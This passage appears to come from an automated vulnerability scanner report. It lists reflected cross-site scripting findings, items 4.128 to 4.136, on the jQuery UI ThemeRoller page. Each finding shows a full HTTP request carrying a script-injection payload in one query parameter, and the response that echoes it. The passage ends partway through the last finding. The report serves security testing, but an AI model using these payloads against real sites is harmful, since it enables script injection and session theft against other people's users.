GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Content=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive
...[SNIP]...

4.128. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b933"><script>alert(1)</script>c75e71b9a99 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopSh
...[SNIP]...

4.129. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68ae"><script>alert(1)</script>8316832d0b1 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.130. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f2"><script>alert(1)</script>1ea11700b86 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636
...[SNIP]...

4.131. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3cd4"><script>alert(1)</script>c1869e1c15c was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefau
...[SNIP]...

4.132. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>4cac5b3259f was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bg
...[SNIP]...

4.133. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3652"><script>alert(1)</script>712a67946a6 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ht=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow
...[SNIP]...

4.134. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5736"><script>alert(1)</script>7a42dd72740 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColo
...[SNIP]...

4.135. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef96f"><script>alert(1)</script>5a4c88ddb1b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColor
...[SNIP]...

4.136. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4287e"><script>alert(1)</script>b19fe4c69d3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

